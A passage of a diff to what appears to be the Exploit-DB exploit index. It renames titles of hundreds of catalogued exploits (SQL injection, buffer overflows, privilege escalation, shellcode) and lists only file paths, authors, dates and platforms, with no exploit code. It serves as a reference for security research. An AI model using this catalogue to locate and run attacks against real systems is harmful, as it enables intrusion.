Read",2015-11-09,"Google Security Research",multiple,dos,0 @@ -34971,11 +34977,11 @@ id,file,description,date,author,platform,type,port 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 -38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 -38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 +38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 +38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 -38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 +38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0 38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps,0 38707,platforms/hardware/webapps/38707.txt,"D-Link Wireless Router DIR-816L - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 @@ -35020,7 +35026,7 @@ id,file,description,date,author,platform,type,port 38747,platforms/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 -38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 +38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 @@ -35096,7 +35102,7 @@ id,file,description,date,author,platform,type,port 38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 38828,platforms/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 -38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 +38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0 @@ -35105,7 +35111,7 @@ id,file,description,date,author,platform,type,port 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 38843,platforms/php/webapps/38843.txt,"TomatoCart - 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0 -38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0 +38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0 38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 @@ -35179,7 +35185,7 @@ id,file,description,date,author,platform,type,port 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 -38917,platforms/osx/dos/38917.txt,"Apple Mac OS X 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 +38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 @@ -35217,7 +35223,7 @@ id,file,description,date,author,platform,type,port 38954,platforms/php/webapps/38954.txt,"Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38955,platforms/php/webapps/38955.txt,"Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38956,platforms/php/webapps/38956.txt,"Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 -38957,platforms/php/webapps/38957.html,"Command School Student Management System - /sw/Admin_change_Password.php Admin Password manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38957,platforms/php/webapps/38957.html,"Command School Student Management System - /sw/Admin_change_Password.php Admin Password Manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38958,platforms/php/webapps/38958.html,"Command School Student Management System - /sw/add_topic.php Topic Creation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 @@ -35247,7 +35253,7 @@ id,file,description,date,author,platform,type,port 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 -38987,platforms/php/webapps/38987.html,"Dredge School Administration System - /DSM/loader.php Admin Account manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38987,platforms/php/webapps/38987.html,"Dredge School Administration System - /DSM/loader.php Admin Account Manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38991,platforms/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 @@ -35267,8 +35273,8 @@ id,file,description,date,author,platform,type,port 39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 -39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 -39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 +39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39010,platforms/linux/local/39010.c,"QEMU (Gentoo) - Local Priv Escalation",2015-12-17,zx2c4,linux,local,0 39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35288,9 +35294,9 @@ id,file,description,date,author,platform,type,port 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 -39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39031,platforms/php/webapps/39031.html,"BloofoxCMS - /Admin/index.php Admin User Creation Cross-Site Request Forgery",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Admin User Creation Cross-Site Request Forgery",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39032,platforms/php/webapps/39032.txt,"BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39033,platforms/php/webapps/39033.py,"Joomla 1.5 < 3.4.5 - Object Injection Remote Code Execution x-forwarded-for Header",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 @@ -35327,8 +35333,8 @@ id,file,description,date,author,platform,type,port 39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 -39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80 -39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH Overwrite (PoC)",2015-12-21,Un_N0n,windows,dos,0 +39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80 +39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,windows,dos,0 39072,platforms/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win_x86-64,dos,0 39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service",2014-02-03,"Josue Rojas",cgi,dos,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 @@ -35367,7 +35373,7 @@ id,file,description,date,author,platform,type,port 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 -39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 +39116,platforms/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 @@ -35397,7 +35403,7 @@ id,file,description,date,author,platform,type,port 39144,platforms/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 -39147,platforms/osx/local/39147.c,"Apple Mac OS X - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 +39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0 39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",windows,dos,0 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",hardware,remote,0 @@ -35406,7 +35412,7 @@ id,file,description,date,author,platform,type,port 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 -39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - Password.cgi Admin Password manipulation Cross-Site Request Forgery",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 +39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - Password.cgi Admin Password Manipulation Cross-Site Request Forgery",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 @@ -35453,7 +35459,7 @@ id,file,description,date,author,platform,type,port 39198,platforms/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 -39373,platforms/osx/dos/39373.c,"Apple Mac OS X - Kernel no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39373,platforms/osx/dos/39373.c,"Apple Mac OSX - Kernel no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 @@ -35510,13 +35516,13 @@ id,file,description,date,author,platform,type,port 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 -39371,platforms/osx/dos/39371.c,"Apple Mac OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 -39372,platforms/osx/dos/39372.c,"Apple Mac OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 +39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 +39372,platforms/osx/dos/39372.c,"Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 39269,platforms/php/webapps/39269.txt,"WordPress Lead Octopus Power Plugin - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 -39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress - options-general.php Option manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 +39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress - options-general.php Option Manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 @@ -35538,7 +35544,7 @@ id,file,description,date,author,platform,type,port 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 -40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (64bit) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 +40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 @@ -35553,7 +35559,7 @@ id,file,description,date,author,platform,type,port 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 39306,platforms/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",php,webapps,443 -39375,platforms/osx/dos/39375.c,"Apple Mac OS X - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39375,platforms/osx/dos/39375.c,"Apple Mac OSX - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 @@ -35604,26 +35610,26 @@ id,file,description,date,author,platform,type,port 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 -39357,platforms/osx/dos/39357.txt,"Apple Mac OS X / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 -39358,platforms/multiple/dos/39358.txt,"Apple Mac OS X / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39357,platforms/osx/dos/39357.txt,"Apple Mac OSX / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 +39358,platforms/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 39359,platforms/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39360,platforms/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39361,platforms/ios/dos/39361.txt,"iOS Kernel - AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39362,platforms/ios/dos/39362.txt,"iOS Kernel - AppleOscarCMA Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39363,platforms/ios/dos/39363.txt,"iOS Kernel - IOHIDEventService Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39364,platforms/ios/dos/39364.txt,"iOS Kernel - IOReportHub Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 -39365,platforms/multiple/dos/39365.c,"Apple Mac OS X / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 -39366,platforms/multiple/dos/39366.c,"Apple Mac OS X / iOS - Kernel iokit Registry Iterator manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 -39367,platforms/osx/dos/39367.c,"Apple Mac OS X - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39368,platforms/osx/dos/39368.c,"Apple Mac OS X - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 -39369,platforms/osx/dos/39369.c,"Apple Mac OS X - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39370,platforms/osx/dos/39370.c,"Apple Mac OS X - Kernel Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39376,platforms/osx/dos/39376.c,"Apple Mac OS X - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39377,platforms/multiple/dos/39377.c,"Apple Mac OS X / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 -39378,platforms/multiple/dos/39378.c,"Apple Mac OS X / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 -39379,platforms/multiple/dos/39379.txt,"Apple Mac OS X / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 -39380,platforms/osx/dos/39380.c,"Apple Mac OS X - OSMetaClassBase::safeMetaCast in 